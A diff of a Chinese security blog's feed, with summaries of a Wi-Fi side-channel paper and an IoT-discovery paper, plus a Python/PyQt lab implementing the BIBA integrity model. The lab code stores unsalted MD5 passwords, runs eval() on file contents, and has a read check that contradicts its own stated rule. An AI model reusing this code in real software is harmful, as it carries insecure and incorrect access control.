CTS，因为它是802.11标准的一部分，并且该原则不太可能很快改变。虽然作者只讨论威胁模型，其中来自受害客户端的连接是针对性的，但攻击实际上也适用于源自通过同一无线路由器连接的其他客户端的连接。这是因为所有这些客户端（例如，在相同NAT之后）共享了相同的冲突域并因此遭受相同的定时信道。通过探测数据包在任何客户端上触发的响应将有效地延迟探测后查询。在这种情况下，受害者连接（通过傀儡打开）只是为远程攻击者提供了测量碰撞的机会。此外，我们可以扩展威胁模型以考虑无线连接的服务器，例如物联网设备。已经证明，通过公共IP地址和开放端口可以访问数百万个物联网设备。在这种情况下，可以针对此类IoT设备上的连接启动完全偏离路径的攻击。例如，计算在连接上交换的字节，终止与另一主机的连接，在正在进行的telnet连接上注入恶意命令。]]></content>
       <categories>
-          
-          <category> 顶会论文 </category>
-          
+        <category>顶会论文</category>
       </categories>
-      
-      
-        <tags>
-            
-            <tag> USENIX </tag>
-            
-            <tag> 数据挖掘 </tag>
-            
-            <tag> 自然语言处理 </tag>
-            
-        </tags>
-      
-    </entry>
-    
-    
-    
-    <entry>
-      <title>利用python实现BIBA模型</title>
-      <link href="/2018/11/16/BIBA%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E6%A8%A1%E5%9E%8B%E5%AE%9E%E7%8E%B0(python)/"/>
-      <url>/2018/11/16/BIBA%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E6%A8%A1%E5%9E%8B%E5%AE%9E%E7%8E%B0(python)/</url>
-      
-        <content type="html"><![CDATA[<h1 id="基于python语言的BIBA模型图形界面实现"><a href="#基于python语言的BIBA模型图形界面实现" class="headerlink" title="基于python语言的BIBA模型图形界面实现"></a>基于python语言的BIBA模型图形界面实现</h1><h2 id="一、实验目的："><a href="#一、实验目的：" class="headerlink" title="一、实验目的："></a>一、实验目的：</h2><ol><li><strong>查阅资料，了解biba安全模型的相关知识</strong></li><li><strong>通过编程实现基于biba模型的完整性访问控制，进一步掌握biba模型的规则</strong></li><li><strong>使用python语言实现，熟练pyqt的图形界面设计方法</strong></li></ol><hr><h2 id="二、实验环境："><a href="#二、实验环境：" class="headerlink" title="二、实验环境："></a>二、实验环境：</h2><ul><li>操作系统：Windows10</li><li>工具版本：python3.7，pyqt5</li></ul><hr><h2 id="三、实验原理："><a href="#三、实验原理：" class="headerlink" title="三、实验原理："></a>三、实验原理：</h2><h4 id="1-什么是安全模型"><a href="#1-什么是安全模型" class="headerlink" title="1. 什么是安全模型"></a>1. 什么是安全模型</h4><ul><li>系统的元素  <blockquote><p>具有行为能力的主体<br>不具有行为能力的客体</p></blockquote></li><li>系统的操作行为<blockquote><p>可以执行的命令：读、写、执行</p></blockquote></li><li>对系统行为的约束方式<blockquote><p>对行为的控制策略</p></blockquote></li><li>模型从抽象层次规定了系统行为和约束行为的方式</li><li>模型往往用状态来表示<blockquote><p>系统行为所依赖的环境<br>行为对系统产生的效果</p></blockquote><h4 id="2-biba完整性模型："><a href="#2-biba完整性模型：" class="headerlink" title="2. biba完整性模型："></a>2. biba完整性模型：</h4><ul><li>完整性威胁问题<blockquote><p>完整性的威胁就是一个子系统在初始时刻认为不正常的修改行为；<br>来源：内部&amp;外部；<br>类型：直接&amp;间接</p></blockquote></li></ul></li></ul><table><thead><tr><th>外部的直接</th><th>外部的间接</th><th>内部的直接</th><th>内部的间接</th></tr></thead><tbody><tr><td>外部系统恶意地篡改另一个系统的数据或程序</td><td>一个外部系统插入恶意的子程序</td><td>修改自己的代码</td><td>修改自己的指针</td></tr></tbody></table><ul><li>biba模型的完整性定义<blockquote><p>完整性级别高的实体对完整性低的实体具有完全的支配性，反之如果一个实体对另一个实体具有完全的控制权，说明前者完整性级别更高，这里的实体既可以是主体也可以是客体。<br>完整性级别和可信度有密切的关系，完整级别越高，意味着可信度越高。</p></blockquote></li><li>biba模型的规则   </li></ul><ul><li style="list-style: none"><input type="checkbox"> 对于写和执行操作，有如下规则：<blockquote><p><strong>写规则控制</strong><br>当且仅当主体S的完整性级别大于或等于客体O的完整性级别时，主体S可以写客体O,一般称之为<strong>上写</strong>。<br><strong>执行操作控制</strong><br>当且仅当主体S2的完整性级别高于或等于S1,主体S1可以执行主体S2。  </p></blockquote></li><li style="list-style: none"><input type="checkbox"> 关于读操作，有不同的控制策略：<blockquote><p><strong>低水标模型</strong><br>任意主体可以读任意完整性级别的客体，但是如果主体读完整性级别比自己低的客体时，主体的完整性级别将为客体完整性级别，否则，主体的完整性级别保持不变。<br><strong>环模型</strong><br>不管完整性级别如何，任何主体都可以读任何客体<br><strong>严格完整性模型</strong><br>这个模型对读操作是根据主客体的完整性级别严格控制的，即只有完整性级别低或相等的主体才可以读完整性级别高的客体，称为<strong>下读</strong></p></blockquote></li></ul><p><strong>一般都是指毕巴严格完整性模型，总结来说是上写、下读</strong></p><hr><h2 id="四、实验内容："><a href="#四、实验内容：" class="headerlink" title="四、实验内容："></a>四、实验内容：</h2><h3 id="1-用户登录实现"><a href="#1-用户登录实现" class="headerlink" title="1.  用户登录实现"></a>1.  用户登录实现</h3><p><strong>核对用户输入的账户密码与存储的是否匹配</strong></p><p><img src="https://github.com/Cool-Y/BIBA-model/blob/master/img/login.PNG" alt="login"></p><ul><li>从用户输入框获取账户和密码</li><li>检查输入信息是否合法（为空）</li><li>从password.txt中获取，并保存在列表listFromLine中</li><li>检查输入的账户是否存在</li><li>若存在，检查对应的密码是否正确</li><li><p>若正确，判断是管理员还是普通用户，并跳转相应的界面</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">checkPass</span><span class="params">(self)</span>:</span></span><br><span class="line">    nameIn = self.lineEdit.text()</span><br><span class="line">    passwdIn = self.lineEdit_2.text()</span><br><span class="line">    md5 = hashlib.md5()</span><br><span class="line">    md5.update(passwdIn.encode(<span class="string">"utf-8"</span>))</span><br><span class="line">    passwdIn = md5.hexdigest()</span><br><span class="line">    <span class="keyword">if</span> (nameIn == <span class="string">''</span>) <span class="keyword">or</span> (passwdIn == <span class="string">''</span>):</span><br><span class="line">        QMessageBox.warning(self,</span><br><span class="line">                            <span class="string">"警告"</span>,</span><br><span class="line">                            <span class="string">"账号和密码不能为空"</span>,</span><br><span class="line">                            QMessageBox.Yes)</span><br><span class="line">        self.lineEdit.setFocus()</span><br><span class="line">    print(nameIn, passwdIn)</span><br><span class="line">    fr = open(<span class="string">'./etc/passwd.txt'</span>)</span><br><span class="line">    arrayofLines = fr.readlines()</span><br><span class="line">    numberofLines = len(arrayofLines)</span><br><span class="line">    <span class="keyword">for</span> line <span class="keyword">in</span> arrayofLines:</span><br><span class="line">        line = line.strip()</span><br><span class="line">        listFromLine = line.split(<span class="string">':'</span>)</span><br><span class="line">        name = listFromLine[<span class="number">0</span>]</span><br><span class="line">        <span class="keyword">if</span> name == nameIn:</span><br><span class="line">            numberofLines = <span class="number">-1</span></span><br><span class="line">            passwd = listFromLine[<span class="number">1</span>]</span><br><span class="line">            <span class="keyword">if</span> passwd == passwdIn:</span><br><span class="line">                group = listFromLine[<span class="number">2</span>]</span><br><span class="line">                print(<span class="string">"\n登录成功!\n"</span>)</span><br><span class="line">                <span class="keyword">if</span> name == <span class="string">'root'</span>:</span><br><span class="line">                    print(<span class="string">'root登录'</span>)</span><br><span class="line">                    rootUI.show()</span><br><span class="line">                    MainWindow.close()</span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    urName = nameIn</span><br><span class="line">                    mainUI.lineEdit.setText(urName)</span><br><span class="line">                    mainUI.lineEdit_2.setText(group)</span><br><span class="line">                    mainUI.show()</span><br><span class="line">                    MainWindow.close()</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                QMessageBox.warning(self,</span><br><span class="line">                                    <span class="string">"警告"</span>,</span><br><span class="line">                                    <span class="string">"密码错误！"</span>,</span><br><span class="line">                                    QMessageBox.Yes)</span><br><span class="line">                self.lineEdit.setFocus()</span><br><span class="line">    fr.close()</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span></span><br></pre></td></tr></table></figure></li></ul><hr><h3 id="2-管理员功能实现"><a href="#2-管理员功能实现" class="headerlink" title="2.  管理员功能实现"></a>2.  管理员功能实现</h3><p><strong>管理员可以对用户进行增、删、查的操作</strong></p><p><img src="https://github.com/Cool-Y/BIBA-model/blob/master/img/rootUI.PNG" alt="login"></p><h4 id="增加用户的实现"><a href="#增加用户的实现" class="headerlink" title="增加用户的实现"></a>增加用户的实现</h4><blockquote><ul><li>获取管理员输入的用户名、密码和用户等级</li><li>将明文密码转换为md5值</li><li>判断输入的账户是否已经存在以及是否为空</li><li>如果没有问题，将其存入passwd.txt的末尾</li></ul></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">adduser</span><span class="params">(self)</span>:</span></span><br><span class="line">      print(<span class="string">'开始添加'</span>)</span><br><span class="line">      name = self.lineEdit_4.text()</span><br><span class="line">      passwd = self.lineEdit_6.text()</span><br><span class="line">      md5 = hashlib.md5()</span><br><span class="line">      md5.update(passwd.encode(<span class="string">"utf-8"</span>))</span><br><span class="line">      passwd = md5.hexdigest()</span><br><span class="line">      group = self.comboBox.currentText()</span><br><span class="line">      self.name = name</span><br><span class="line">      <span class="keyword">if</span> self.euxit():</span><br><span class="line">          <span class="keyword">if</span> name == <span class="string">''</span> <span class="keyword">or</span> passwd == <span class="string">''</span>:</span><br><span class="line">              QMessageBox.warning(self,</span><br><span class="line">                                  <span class="string">"警告"</span>,</span><br><span class="line">                                  <span class="string">"账号和密码不能为空"</span>,</span><br><span class="line">                                  QMessageBox.Yes)</span><br><span class="line">              self.lineEdit.setFocus()</span><br><span class="line">          <span class="keyword">else</span>:</span><br><span class="line">              cur_path = os.getcwd()</span><br><span class="line">              filename = cur_path + <span class="string">'/etc/passwd.txt'</span></span><br><span class="line">              fi = open(filename, <span class="string">'r+'</span>)</span><br><span class="line">              str = name + <span class="string">':'</span> + passwd + <span class="string">':'</span> + group + <span class="string">'\n'</span></span><br><span class="line">              print(<span class="string">'成功增加用户'</span> + str + <span class="string">'\n'</span>)</span><br><span class="line">              fi.seek(<span class="number">0</span>, <span class="number">2</span>)</span><br><span class="line">              fi.write(str)</span><br><span class="line">              fi.close()</span><br><span class="line">      <span class="keyword">else</span>:</span><br><span class="line">          QMessageBox.warning(self,</span><br><span class="line">                              <span class="string">"警告"</span>,</span><br><span class="line">                              <span class="string">"用户已存在"</span>,</span><br><span class="line">                              QMessageBox.Yes)</span><br><span class="line">          self.lineEdit.setFocus()</span><br></pre></td></tr></table></figure><h4 id="查询已有用户的实现"><a href="#查询已有用户的实现" class="headerlink" title="查询已有用户的实现"></a>查询已有用户的实现</h4><blockquote><p>从passwd.txt中逐行读出</p></blockquote><p><img src="https://github.com/Cool-Y/BIBA-model/blob/master/img/existUser.PNG" alt="login"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">readuser</span><span class="params">(self)</span>:</span></span><br><span class="line">      print(<span class="string">'readuser'</span>)</span><br><span class="line">      cur_path = os.getcwd()</span><br><span class="line">      filename = cur_path + <span class="string">'/etc/passwd.txt'</span></span><br><span class="line">      fo = open(filename)</span><br><span class="line">      arrayofLines = fo.readlines()</span><br><span class="line">      names = <span class="string">''</span></span><br><span class="line">      <span class="keyword">for</span> line <span class="keyword">in</span> arrayofLines:</span><br><span class="line">          line = line.strip()</span><br><span class="line">          listFromLine = line.split(<span class="string">':'</span>)</span><br><span class="line">          names = names + listFromLine[<span class="number">0</span>] + <span class="string">'\n'</span></span><br><span class="line">      self.textEdit.setPlaceholderText(names)</span><br></pre></td></tr></table></figure><h4 id="删除用户的实现"><a href="#删除用户的实现" class="headerlink" title="删除用户的实现"></a>删除用户的实现</h4><blockquote><p>从passwd.txt中逐行读出用户名，并与待删除用户比较，如果相同，则删除该行</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">rmuser</span><span class="params">(self)</span>:</span></span><br><span class="line">      print(<span class="number">1</span>)</span><br><span class="line">      cur_path = os.getcwd()</span><br><span class="line">      filename = cur_path + <span class="string">'/etc/passwd.txt'</span></span><br><span class="line">      rmName = self.lineEdit.text()</span><br><span class="line">      <span class="keyword">with</span> open(filename, <span class="string">'r'</span>,encoding=<span class="string">"utf-8"</span>) <span class="keyword">as</span> r:</span><br><span class="line">          lines = r.readlines()</span><br><span class="line">          lenl = len(lines)</span><br><span class="line">      <span class="keyword">with</span> open(filename, <span class="string">'w'</span>,encoding=<span class="string">"utf-8"</span>) <span class="keyword">as</span> w:</span><br><span class="line">          <span class="keyword">for</span> line <span class="keyword">in</span> lines:</span><br><span class="line">              l = line.strip()</span><br><span class="line">              listFromLine = l.split(<span class="string">':'</span>)</span><br><span class="line">              <span class="keyword">if</span> rmName == listFromLine[<span class="number">0</span>]:</span><br><span class="line">                  print(<span class="string">'删除用户'</span> + rmName)</span><br><span class="line">                  <span class="keyword">continue</span></span><br><span class="line">              <span class="keyword">if</span> line == <span class="string">'\n'</span>:</span><br><span class="line">                  print(<span class="string">'find换行'</span>)</span><br><span class="line">                  line = <span class="string">''</span></span><br><span class="line">              w.write(line)</span><br></pre></td></tr></table></figure><hr><h3 id="3-普通用户功能实现"><a href="#3-普通用户功能实现" class="headerlink" title="3.  普通用户功能实现"></a>3.  普通用户功能实现</h3><p><strong>普通用户可以完成对合法权限文件的读取、增加内容（上写下读）以及创建文件的操作</strong></p><p><img src="https://github.com/Cool-Y/BIBA-model/blob/master/img/normal.PNG" alt="login"></p><h4 id="读取文件内容"><a href="#读取文件内容" class="headerlink" title="读取文件内容"></a>读取文件内容</h4><blockquote><p>双击文件名<br>获取选中文件和当前用户的完整性级别<br>如果用户的级别低于文件，则读取文件内容</p></blockquote>   <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">readfile</span><span class="params">(self)</span>:</span></span><br><span class="line">    dict = self.getGrade()</span><br><span class="line">    fgrade = str(dict[self.file_path])</span><br><span class="line">    ugrade = self.lineEdit_2.text()</span><br><span class="line">    <span class="keyword">if</span> ugrade &gt;=  fgrade:</span><br><span class="line">        print(ugrade+ <span class="string">' 正在读取  '</span>+fgrade)</span><br><span class="line">        filename = self.file_path</span><br><span class="line">        print(filename)</span><br><span class="line">        fr = open(filename)</span><br><span class="line">        lines = <span class="string">''</span></span><br><span class="line">        arrayofLines = fr.readlines()</span><br><span class="line">        <span class="keyword">for</span> line <span class="keyword">in</span> arrayofLines:</span><br><span class="line">            lines += line</span><br><span class="line">        self.textEdit.setText(lines)</span><br><span class="line">        print(<span class="string">'读取成功\n'</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        QMessageBox.warning(self,</span><br><span class="line">                            <span class="string">"警告"</span>,</span><br><span class="line">                            <span class="string">"您的用户等级太高"</span>,</span><br><span class="line">                            QMessageBox.Yes)</span><br><span class="line">        self.lineEdit.setFocus()</span><br></pre></td></tr></table></figure><h4 id="增加文件内容"><a href="#增加文件内容" class="headerlink" title="增加文件内容"></a>增加文件内容</h4><blockquote><p>双击文件名<br>获取选中文件和当前用户的完整性级别<br>如果用户的级别高于文件，则写入文件内容</p></blockquote>   <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">writefile</span><span class="params">(self)</span>:</span></span><br><span class="line">    dict = self.getGrade()</span><br><span class="line">    fgrade = dict[self.file_path]</span><br><span class="line">    ugrade = self.lineEdit_2.text()</span><br><span class="line">    print(ugrade + <span class="string">' 正在写入  '</span> + fgrade)</span><br><span class="line">    <span class="keyword">if</span> ugrade &lt;= fgrade:</span><br><span class="line">        filename = self.file_path</span><br><span class="line">        str = self.textEdit.toPlainText()</span><br><span class="line">        print(str)</span><br><span class="line">        fo = open(filename, <span class="string">'r+'</span>)</span><br><span class="line">        fo.seek(<span class="number">0</span>, <span class="number">2</span>)</span><br><span class="line">        fo.write(str)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        QMessageBox.warning(self,</span><br><span class="line">                            <span class="string">"警告"</span>,</span><br><span class="line">                            <span class="string">"您的用户等级太低"</span>,</span><br><span class="line">                            QMessageBox.Yes)</span><br><span class="line">        self.lineEdit.setFocus()</span><br></pre></td></tr></table></figure><h4 id="创建文件"><a href="#创建文件" class="headerlink" title="创建文件"></a>创建文件</h4><blockquote><p>获取当前用户名和输入的文件名<br>在当前路径下创建名为用户名的文件<br>并对新创建的文件与用户等级建立字典，新文件路径为key，用户等级为value<br>这个字典方便读写时判断等级高低</p></blockquote>   <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">touchfile</span><span class="params">(self)</span>:</span></span><br><span class="line">    urName = self.lineEdit.text()</span><br><span class="line">    filename = self.lineEdit_4.text()</span><br><span class="line">    cur_path = os.getcwd()</span><br><span class="line">    new_path = os.path.join(cur_path + <span class="string">'/file'</span>, urName)</span><br><span class="line">    print(urName)</span><br><span class="line">    <span class="keyword">if</span> os.path.exists(new_path) == <span class="literal">False</span>:</span><br><span class="line">        os.mkdir(new_path)</span><br><span class="line">    os.chdir(new_path)</span><br><span class="line">    fr = open(filename, <span class="string">'w'</span>)</span><br><span class="line">    key = (new_path + <span class="string">'/'</span> + filename).replace(<span class="string">'\\'</span>, <span class="string">'/'</span>)</span><br><span class="line">    fr.close()</span><br><span class="line">    os.chdir(cur_path)</span><br><span class="line">    fa = open(<span class="string">'./etc/ac.txt'</span>, <span class="string">'r'</span>)</span><br><span class="line">    a = fa.read()</span><br><span class="line">    <span class="keyword">if</span> a == <span class="string">''</span>:</span><br><span class="line">        dict = &#123;&#125;</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        dict = eval(a)</span><br><span class="line">    dict[key] = self.lineEdit_2.text()</span><br><span class="line">    fr = open(<span class="string">'./etc/ac.txt'</span>, <span class="string">'w'</span>)</span><br><span class="line">    fr.write(str(dict))</span><br><span class="line">    fr.close()</span><br><span class="line">    fa.close()</span><br></pre></td></tr></table></figure><hr><h2 id="五、心得体会："><a href="#五、心得体会：" class="headerlink" title="五、心得体会："></a>五、心得体会：</h2><h2 id="六、改进部分："><a href="#六、改进部分：" class="headerlink" title="六、改进部分："></a>六、改进部分：</h2>]]></content>
-      
-      
+      <tags>
+        <tag>侧信道攻击</tag>
+        <tag>wifi</tag>
+      </tags>
+  </entry>
+  <entry>
+    <title><![CDATA[Acquisitional Rule-based Engine for Discovering Internet-of-Things Devices]]></title>
+    <url>%2F2018%2F12%2F23%2F%E5%9F%BA%E4%BA%8E%E8%A7%84%E5%88%99%E5%BC%95%E6%93%8E%E5%8F%91%E7%8E%B0IOT%E8%AE%BE%E5%A4%87%2F</url>
+    <content type="text"><![CDATA[论文来源：USENIX SECURITY 2018下载：原文pdf中文slides 论文解读1. 概要： 物联网（IoT）设备的快速增长的格局为其管理和安全性带来了重大的技术挑战，因为这些物联网设备来自不同的设备类型，供应商和产品模型。 物联网设备的发现是表征，监控和保护这些设备的先决条件。然而，手动设备注释阻碍了大规模发现，并且基于机器学习的设备分类需要具有标签的大型训练数据。因此，大规模的自动设备发现和注释仍然是物联网中的一个悬而未决的问题。 这篇文章提出了一种基于采集规则的引擎（ARE），它可以自动生成用于在没有任何训练数据的情况下发现和注释物联网设备的规则。ARE通过利用来自物联网设备的应用层响应数据和相关网站中的产品描述来构建设备规则，以进行设备注释。我们将事务定义为对产品描述的唯一响应之间的映射。 为了收集交易集，ARE提取响应数据中的相关术语作为抓取网站的搜索查询。ARE使用关联算法以（类型，供应商和产品）的形式生成物联网设备注释的规则。我们进行实验和三个应用程序来验证ARE的有效性。 2. 背景与动机： 物联网蓬勃发展，造就了物联网设备的广泛应用，它不仅种类繁多，包括摄像头、打印机、路由器、电视盒子、工控系统、医疗设备等，而且数量庞大，据统计，每天就会新增5500000台物联网设备。 但是由于设备脆弱、缺乏管理和配置不当，物联网设备相比传统计算机要更不安全，比如之前爆发的Mirai僵尸网络，给美国造成了重大的损失。因此，为了更主动地保护IOT设备，提前发现、登记和注释物联网设备成为先决条件。 设备注释的内容通常为“设备类型(e.g.,routers) + 供应商(e.g.,CISCO) + 产品型号(e.g.,TV-IP302P)”，传统生成设备注释的方法有基于指纹的，也有使用标志获取的，前者对数据集和大量设备模型的要求很高，而后者需要专业知识的人工方式，因此不可能用于大规模注释而且很难去维护更新。 所以，作者希望提出一种减少对数据集和人工依赖的注释方式。本文的方法主要基于两个事实，第一个Figure 1是制造商通常会将相关信息硬编码到IOT设备，第二个Figure 2是有许多网站（如产品测评）会描述设备产品。从第一个事实，我们可以从应用层数据包获取关键词，然后根据这些关键词依据第二个事实进行网页爬虫，以获取网页上的相关描述，然后对这些描述进行自然语言处理和数据挖掘，从而建立起基于规则的映射。 3. 核心工作—Rule Miner： Rule Miner由三个部分构成，Transaction set是一对由应用层数据和相关网页组成的文本单元，它生成了一种规则： ，其中A是从应用层数据包中提取的一些特征，B是从相关网页抓取的设备描述；Device entity recognition结合了基于语料库的NER和基于规则的NER(命名实体识别)，前者解决了设备类型和供应商名，后者使用正则表达式识别出产品型号。但是由于一个不相干的网页也可能包含设备类型的关键词(如switch)，以及一个短语可能因为满足正则表达式而被认为是型号所以表现并不好，但好在实体与实体之间具有很高的依赖性，这三个元素常常一起出现。数据挖掘算法Apriori algorithm用于从Transaction中学习“关系”。 4. 完整架构和应用 完整的ARE除了核心Rule Miner之外，还有Transaction Collection用于收集响应数据和网络爬虫，Rule Library用于存储生成的规则，Planner用于更新规则。作者主要将ARE应用于三个方面，一是互联网范围的设备测量统计，二是对受损设备进行检测，三是对易受攻击的设备进行分析。之后对ARE的效果与Nmap进行比较和评估，从产生规则的数量、规则的准确率和覆盖率、动态学习规则的能力以及时间代价，ARE都要优于Nmap。 5. 工作总结： 提出ARE的框架：不需要数据集和人工干预，自动生成用于IOT设备识别的规则。 实现了ARE的原型并评估了它的效果：ARE在一周内生成了大量的规则，而且IOT设备识别的细粒度超过现有工具。 应用于三个场景中，主要发现有：大量IOT设备在互联网中可以抵达；成千上万的IOT设备易受攻击且暴露给了公众。]]></content>
       <categories>
-          
-          <category> 理论学习 </category>
-          
+        <category>顶会论文</category>
       </categories>
-      
-      
-        <tags>
-            
-            <tag> 模型实现 </tag>
-            
-            <tag> python </tag>
-            
-            <tag> 访问控制 </tag>
-            
-        </tags>
-      
-    </entry>
-    
-    
-    
-    <entry>
-      <title>Hello World</title>
-      <link href="/2000/01/01/hello-world/"/>
-      <url>/2000/01/01/hello-world/</url>
-      
-        <content type="html"><![CDATA[<p>你好！我是混元霹雳手</p>]]></content>
-      
-      
-      
-    </entry>
-    
-    
-  
-  
+      <tags>
+        <tag>USENIX</tag>
+        <tag>数据挖掘</tag>
+        <tag>自然语言处理</tag>
+      </tags>
+  </entry>
+  <entry>
+    <title><![CDATA[利用python实现BIBA模型]]></title>
+    <url>%2F2018%2F11%2F16%2FBIBA%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E6%A8%A1%E5%9E%8B%E5%AE%9E%E7%8E%B0(python)%2F</url>
+    <content type="text"><![CDATA[基于python语言的BIBA模型图形界面实现一、实验目的： 查阅资料，了解biba安全模型的相关知识 通过编程实现基于biba模型的完整性访问控制，进一步掌握biba模型的规则 使用python语言实现，熟练pyqt的图形界面设计方法 二、实验环境： 操作系统：Windows10 工具版本：python3.7，pyqt5 三、实验原理：1. 什么是安全模型 系统的元素 具有行为能力的主体不具有行为能力的客体 系统的操作行为 可以执行的命令：读、写、执行 对系统行为的约束方式 对行为的控制策略 模型从抽象层次规定了系统行为和约束行为的方式 模型往往用状态来表示 系统行为所依赖的环境行为对系统产生的效果 2. biba完整性模型： 完整性威胁问题 完整性的威胁就是一个子系统在初始时刻认为不正常的修改行为；来源：内部&amp;外部；类型：直接&amp;间接 外部的直接 外部的间接 内部的直接 内部的间接 外部系统恶意地篡改另一个系统的数据或程序 一个外部系统插入恶意的子程序 修改自己的代码 修改自己的指针 biba模型的完整性定义 完整性级别高的实体对完整性低的实体具有完全的支配性，反之如果一个实体对另一个实体具有完全的控制权，说明前者完整性级别更高，这里的实体既可以是主体也可以是客体。完整性级别和可信度有密切的关系，完整级别越高，意味着可信度越高。 biba模型的规则 对于写和执行操作，有如下规则： 写规则控制当且仅当主体S的完整性级别大于或等于客体O的完整性级别时，主体S可以写客体O,一般称之为上写。执行操作控制当且仅当主体S2的完整性级别高于或等于S1,主体S1可以执行主体S2。 关于读操作，有不同的控制策略： 低水标模型任意主体可以读任意完整性级别的客体，但是如果主体读完整性级别比自己低的客体时，主体的完整性级别将为客体完整性级别，否则，主体的完整性级别保持不变。环模型不管完整性级别如何，任何主体都可以读任何客体严格完整性模型这个模型对读操作是根据主客体的完整性级别严格控制的，即只有完整性级别低或相等的主体才可以读完整性级别高的客体，称为下读 一般都是指毕巴严格完整性模型，总结来说是上写、下读 四、实验内容：1. 用户登录实现核对用户输入的账户密码与存储的是否匹配 从用户输入框获取账户和密码 检查输入信息是否合法（为空） 从password.txt中获取，并保存在列表listFromLine中 检查输入的账户是否存在 若存在，检查对应的密码是否正确 若正确，判断是管理员还是普通用户，并跳转相应的界面 1234567891011121314151617181920212223242526272829303132333435363738394041424344def checkPass(self): nameIn = self.lineEdit.text() passwdIn = self.lineEdit_2.text() md5 = hashlib.md5() md5.update(passwdIn.encode("utf-8")) passwdIn = md5.hexdigest() if (nameIn == '') or (passwdIn == ''): QMessageBox.warning(self, "警告", "账号和密码不能为空", QMessageBox.Yes) self.lineEdit.setFocus() print(nameIn, passwdIn) fr = open('./etc/passwd.txt') arrayofLines = fr.readlines() numberofLines = len(arrayofLines) for line in arrayofLines: line = 